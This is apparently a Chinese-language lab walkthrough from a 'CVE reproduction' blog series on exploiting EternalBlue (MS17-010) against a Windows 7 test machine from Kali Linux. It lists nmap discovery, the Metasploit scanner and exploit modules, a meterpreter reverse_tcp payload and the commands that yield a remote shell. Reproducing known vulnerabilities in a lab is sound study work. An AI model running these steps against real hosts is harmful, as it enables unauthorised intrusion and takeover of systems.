[CVE漏洞复现系列]CVE2017_0147：永恒之蓝

Hi~ o(￣▽￣)ブ

---

前言

这是新的系列，我能力有限有的漏洞实现不了，我尽力吧

---

一、永恒之蓝是什么？

永恒之蓝（Eternal Blue）爆发于2017年4月14日晚，是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被入侵的计算机。甚至于2017年5月12日， 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，使全世界大范围内遭受了该勒索病毒，甚至波及到学校、大型企业、政府等机构，只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

1.SMB协议介绍。

SMB（ServerMessage Block）通信协议是微软（Microsoft）和英特尔(Intel)在1987年制定的协议，主要是作为Microsoft网络的通讯协议。SMB 是在会话层（session layer）和表示层（presentation layer）以及小部分应用层（application layer）的协议。SMB使用了NetBIOS的应用程序接口 （Application Program Interface，简称API），一般端口使用为139，445。

二、准备工作

1.Windows7 and kali linux

2.テストを開始

打开终端输入

nmap -sP 输入kali的IP地址/24

找到win7的IP

nmap -O win7IP地址

我们可以看到，445端口是开着的，(废话，刚装的Windows端口本来就是开着的)
打开metasploit

搜索扫描和攻击模块
输入

search ms17_010

exploit/windows/smb/ms17_010_eternalblue 攻击模块
auxiliary/scanner/smb/smb_ms17_010 扫描模块

让我们使用扫描

use auxiliary/scanner/smb/smb_ms17_010 

输入hosts
就像这样

接着执行这个已经设置好参数的探测模块

输入

run

翻译：[+]192.168.169.193:445-主机可能对MS17-010脆弱！-Windows 7 Professional 7600 x64（64位）
     [*]192.168.169.193:445-扫描了1台主机中的1台（100%完成）
     [*]辅助模块执行完成

扫描完成了，我们该使用攻击模块了

run exploit/windows/smb/ms17_010_eternalblue

我们需要设置的参数为payload(攻击载荷),rhost(目标IP)

set payload windows/x64/meterpreter/reverse_tcp

最后一步，输入

exploit

已经成功了，输入shell拿权限
输入

chcp 65001

解决乱码问题
然后就为所欲为了

---

总结